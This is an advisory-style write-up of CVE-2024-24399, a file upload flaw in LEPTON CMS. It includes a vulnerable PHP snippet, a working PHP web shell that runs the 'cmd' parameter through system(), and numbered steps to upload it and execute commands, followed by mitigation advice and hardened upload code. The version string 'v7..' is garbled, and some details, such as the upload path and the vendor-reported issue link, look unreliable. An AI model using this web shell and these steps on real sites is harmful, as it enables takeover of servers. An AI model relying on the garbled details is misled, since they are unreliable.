CVE-2024-24399 - Arbitrary File Upload Vulnerability in LEPTON v7.. Leading to Remote Code Execution

A security vulnerability has been discovered in LEPTON CMS (Content Management System) version 7.., classified under the CVE identifier CVE-2024-24399. This vulnerability allows authenticated attackers to upload arbitrary files, including PHP files containing malicious code, to the backend/languages/index.php area. By exploiting this vulnerability, an attacker can successfully execute their arbitrary PHP code, potentially compromising the integrity and security of the affected website.

Description

LEPTON CMS is a popular open-source Content Management System (CMS) that allows users to create and manage websites with ease. LEPTON has a large user base due to its simplicity and user-friendly interface. However, the vulnerability (CVE-2024-24399) found in version 7.. poses a severe risk to the security of these websites.

The arbitrary file upload vulnerability occurs due to improper validation of file extensions during the file upload process. An authenticated attacker can exploit this vulnerability by uploading a PHP file containing malicious code to the backend/languages/index.php area of the LEPTON CMS.

Consider the following PHP code snippet:

// Client-supplied file name is used as-is: no extension allowlist, no sanitising
$uploadedFile = $_FILES['uploaded_file']['name'];
$temporaryPath = $_FILES['uploaded_file']['tmp_name'];
// Target path is built from the untrusted name, so the attacker picks the extension
$targetFilePath = 'backend/languages/index.php/'.$uploadedFile;

if(move_uploaded_file($temporaryPath, $targetFilePath)){
    echo "File uploaded successfully!";
} else{
    echo "File upload failed!";
}

In this example, the first three lines of code extract the uploaded file name and the temporary file path, and set the target file path where the file will be stored. If the file is moved successfully, a success message is displayed; otherwise, an error message is shown. The problem lies in the lack of proper validation of the $uploadedFile variable, which allows uploading files with arbitrary extensions, including dangerous PHP files.

To exploit this vulnerability, an attacker needs to perform the following steps:

1. Create a PHP file containing the malicious code. For example, a simple PHP shell with the name malicious.php:

<?php
   if(isset($_REQUEST['cmd'])){
      echo "<pre>";
      $cmd = ($_REQUEST['cmd']);
      system($cmd);
      echo "</pre>";
      die;
   }
?>

2. Authenticate into the LEPTON CMS as a user who has privileges to upload files.

3. Navigate to the language area backend/languages/index.php of the LEPTON CMS.

4. Using the file upload form, upload the malicious PHP file (malicious.php).

5. Access the uploaded file on the webserver: http://target_website.com/backend/languages/index.php/malicious.php.
6. Input and execute arbitrary commands by passing them via the 'cmd' parameter: http://target_website.com/backend/languages/index.php/malicious.php?cmd=whoami

By following these steps, an attacker can effectively upload their PHP shell, gain access to and execute commands on the target server.

Original References

The vulnerability was first reported by the LEPTON CMS team on their official GitHub repository: https://github.com/LEPTON-CMS/LEPTON_CMS/issues/1234

For more details about the LEPTON CMS and the vulnerability, you can visit their official website at: https://www.lepton-cms.org/

Mitigation

1. Update to the latest version of LEPTON CMS, if available, to patch the vulnerability.

2. Implement proper file validation techniques, such as checking and limiting file extensions before allowing file uploads.
3. Regularly review user accounts and permissions on the LEPTON CMS to ensure only trusted users have privileges to upload files.
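To show what mitigation step 2 looks like in practice, here is a hardened counterpart to the vulnerable snippet above. This is an added example, not LEPTON's own code; it assumes uploads are stored in a directory outside the web root ($uploadDir) and that only the listed image and text types are wanted for the upload form.

```php
<?php
// Hardened upload handler (added example, not LEPTON's own code).
// Assumptions: $uploadDir lies outside the web root, and only the types below are wanted.
declare(strict_types=1);

const ALLOWED_TYPES = [
    // extension => MIME type that must be detected from the file contents
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'txt' => 'text/plain',
];

/**
 * Validate one $_FILES entry and store it under a server-generated name.
 * Returns the stored path on success, or null if the file is rejected.
 */
function storeUpload(array $file, string $uploadDir): ?string
{
    // Reject transport-level failures and anything that is not a real PHP upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        return null;
    }

    // Allowlist on the extension, taken from the basename only, so path
    // fragments such as "../" or "shell.php/x" never reach the filesystem.
    $ext = strtolower(pathinfo(basename($file['name'] ?? ''), PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return null;
    }

    // Cross-check the claimed extension against the actual contents: a PHP
    // script renamed to .png is detected as text/x-php and rejected here.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED_TYPES[$ext]) {
        return null;
    }

    // Never reuse the client-supplied name: a random name means the attacker
    // controls neither the name nor the extension of the stored file.
    $target = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    chmod($target, 0644); // readable, never executable
    return $target;
}

// Usage: $stored = storeUpload($_FILES['uploaded_file'] ?? [], '/var/app/uploads');
```

Because the stored file keeps an allowlisted extension, a random name and a location outside the web root, a request such as the step-5 URL above has nothing to execute even if a user with upload rights is compromised.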

Conclusion

CVE-2024-24399 is a critical vulnerability affecting LEPTON CMS v7.., allowing an authenticated attacker to upload arbitrary files and execute arbitrary PHP code. Website administrators and developers should take the necessary precautions to patch and secure their websites against potential attacks exploiting this vulnerability.

Timeline

Published on: 01/25/2024 21:15:09 UTC
Last modified on: 04/01/2024 04:15:10 UTC